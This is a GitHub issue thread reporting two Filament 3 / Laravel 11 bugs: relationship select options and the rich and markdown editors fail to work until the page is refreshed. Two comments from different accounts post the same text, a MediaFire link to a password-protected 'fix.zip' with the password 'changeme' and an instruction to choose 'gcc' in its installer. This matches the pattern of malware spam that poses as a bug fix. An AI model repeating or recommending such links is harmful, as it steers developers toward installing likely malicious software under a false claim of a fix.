### ISSUE TITLE
Bug On Filament 3 & Laravel 11

### ISSUE THREAD

**Issue by khdfierror** [laravel-filament/filament#14056]
### Package

filament/filament

### Package Version

v3,0,0

### Laravel Version

v11.0.0

### Livewire Version

v3.0.0

### PHP Version

PHP 8.3.0

### Problem description

The first bug is in the select option which has a relationship, when you want to create data the data in the relationship doesn't appear and has to be refreshed.

The second bug is in the rich editor & markdown editor, when you want to create form data it cannot be input and must be refreshed. 

The bug above allows users to have to refresh the page every time

### Expected behavior

please fix the bug

### Steps to reproduce

Just take a look at the bug I reported first

### Reproduction repository (issue will be closed if this is not valid)

github.com/khdfierror/

### Relevant log output

```shell
Bugs do not have an output in the form of an error, only a display
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
